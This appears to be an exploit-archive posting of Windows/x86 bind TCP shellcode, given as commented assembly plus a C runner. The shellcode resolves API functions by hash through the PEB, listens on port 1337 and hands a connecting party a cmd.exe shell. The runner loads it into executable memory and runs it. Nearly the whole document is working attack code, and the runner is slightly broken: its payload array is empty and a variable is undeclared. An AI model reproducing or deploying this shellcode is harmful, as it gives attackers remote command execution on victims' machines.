Windows/x86 Bind TCP Shellcode

Windows/x86 bind TCP shellcode / dynamic PEB and EDT method null-free shellcode. This a bind tcp shellcode that open a listen socket on and port 1337. In order to accomplish this task the shellcode uses the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols. Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.

MD5 | 736f21ab958a376512c0d0673c8c0979

; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
; Author: h4pp1n3ss
; Date: Wed 10/06/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]

; Description:
; This a bind tcp shellcode that open a listen socket on and port 1337. In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.

start: ;

mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering


xor ecx, ecx ; ECX = Null
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder

next_module: ;

mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
jne next_module ; No: try next module

find_function_shorten: ;

jmp find_function_shorten_bnc ; short jump

find_function_ret: ;

pop esi ; ESI = POP return addres
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;

find_function_shorten_bnc: ;
call find_function_ret ; Call fund_function_ret PUSH ret address into the stack

find_function: ;

pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset of PE signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddresOfNames VMA
mov [ebp-4], eax ; Save AddressOfName VMA for later usage

find_function_loop: ;
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name

compute_hash: ;
xor eax, eax ; EAX = Null
cdq ; Null EDX
cld ; Clear direction flag

lodsb ; Load the next bytes from ESI into al
test al, al ; Check for Null terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration

compute_hash_finished: ;

cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad

find_function_finished: ;
popad ; Restore registers
ret ;

resolve_symbols_kernel32: ;
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
push 0x16b3fe72 ; CreateProcessA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save CreateProcessA address for later usage

load_ws2_32: ;
xor eax, eax ; EAX = Null
mov ax, 0x6c6c ; EAX = 0x6c6c
push eax ; ESP = "ll"
push dword 0x642e3233 ; ESP = "32.dll"
push dword 0x5f327377 ; ESP = "ws2_32.dll"
push esp ; ESP = &("ws2_32.dll")
call dword [ebp+0x14] ; Call LoadLibraryA

mov ebx, eax ; Move the base address of ws2_32.dll to EBX
push 0x3bfcedcb ; WSAStartup hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
push 0xadf509d9 ; WSASocketA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x20], eax ; Save WSASocketA address for later usage
push 0xc7701aa4 ; Bind hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x24], eax ; Save Bind address for later usage
push 0xe92eada4 ; listen hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x28], eax ; Save listen address for later usage
push 0x9f5b7976 ; WSAGetLastError hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
push 0x498649e5 ; accept hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x36], eax ; Save acccept address for later usage

call_wsastartup: ;
mov eax, esp ; Move ESP to EAX
mov cx, 0x590 ; Move 0x590 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpWSAData
xor eax, eax ; EAX = Null
mov ax, 0x0202 ; Move version to AX
push eax ; Push wVersionRequired (0x00000202)
call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)

call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
xor eax, eax ; EAX = Null
push eax ; Push dwFlags
push eax ; Push g
push eax ; Push lpProtocolInfo
mov al, 0x06 ; Move AL, IPPROTO_TCP
push eax ; Push protocol
sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
push eax ; Push type
inc eax ; Increase EAX, EAX = 0x02
push eax ; Push af
call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)

create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
mov esi, eax ; Move the SOCKET descriptor to ESI
xor eax, eax ; EAX = Null
push eax ; Push sin_addr (any address
mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
add ax, 0x02 ; Add 0x02 (AF_INET) to AX
push eax ; Push sin_port & sin_family
push esp ; Push pointer to the sockaddr_in structure
pop edi ; EDI = &(sockaddr_in)

call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
xor eax, eax ; EAX = Null
add al, 0x16 ; Set AL to 0x16
push eax ; Push namelen
push edi ; Push *addr
push esi ; Push s
call dword [ebp+0x24] ; Call bind

call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
call dword [ebp+0x32] ; Call WSAGetLastError

call_listen: ;
xor eax, eax ; EAX = Null
push eax ; Push backlog
push esi ; Push s
call dword [ebp+0x28] ; Call WS2_32!listen

call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
xor eax, eax ; EAX = Null
push eax ; Push *addrlen (optional)
push eax ; Push *addr (optional)
push esi ; Push socket HANDLE from WSASocketA()
call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)

create_startupinfoa: ;
mov esi, eax ; Save Handle returned from accept() into ESI
push esi ; Push hStdError
push esi ; Push hStdOutput
push esi ; Push hStdInput
xor eax, eax ; EAX = Null
push eax ; Push lpReserved2
push eax ; Push cbReserved2 & wShowWindow
mov al, 0x80 ; Move 0x80 to AL
xor ecx, ecx ; EAX = Null
mov cl, 0x80 ; Move 0x80 to CL
add eax, ecx ; Set EAX to 0x100
push eax ; Push dwFlags
xor eax, eax ; EAX = Null
push eax ; Push dwFillAttribute
push eax ; Push dwYCountChars
push eax ; Push dwXCountChars
push eax ; Push dwYSize
push eax ; Push dwXSize
push eax ; Push dwY
push eax ; Push dwX
push eax ; Push lpTitle
push eax ; Push lpDesktop
push eax ; Push lpReserved
mov al, 0x44 ; Move 0x44 to AL
push eax ; Push cb
push esp ; Push pointer to the STARTUPINFOA structure
pop edi ; Store pointer to STARTUPINFOA in EDI

create_cmd_string: ;
mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
neg eax ; Negate EAX, EAX = 00657865
push eax ; Push part of the "cmd.exe" string
push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
push esp ; Push pointer to the "cmd.exe" string
pop ebx ; Store pointer to the "cmd.exe" string in EBX

call_createprocessa: ;
mov eax, esp ; Move ESP to EAX
xor ecx, ecx ; ECX = Null
mov cx, 0x390 ; Move 0x390 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
xor eax, eax ; EAX = Null
push eax ; Push lpCurrentDirectory
push eax ; Push lpEnvironment
push eax ; Push dwCreationFlags
inc eax ; Increase EAX, EAX = 0x01 (TRUE)
push eax ; Push bInheritHandles
dec eax ; EAX = Null
push eax ; Push lpThreadAttributes
push eax ; Push lpProcessAttributes
push ebx ; Push lpCommandLine
push eax ; Push lpApplicationName
call dword [ebp+0x18] ; Call CreateProcessA

call_terminate_process: ;
xor eax, eax ; EAX = Null
push eax ; uExitCode
push 0xffffffff ; HANDLE hProcess
call dword [ebp+0x04] ; Call TerminateProcess

[*]================================= POC =============================== [*]


Shellcode runner author: reenz0h (twitter: @sektor7net)

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

unsigned char payload[] =

unsigned int payload_len = 415;

int main(void) {

void * exec_mem;
BOOL rv;
DWORD oldprotect = 0;

exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

RtlMoveMemory(exec_mem, payload, payload_len);

rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

printf("Shellcode Length: %d\n", strlen(payload));

if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);


return 0;

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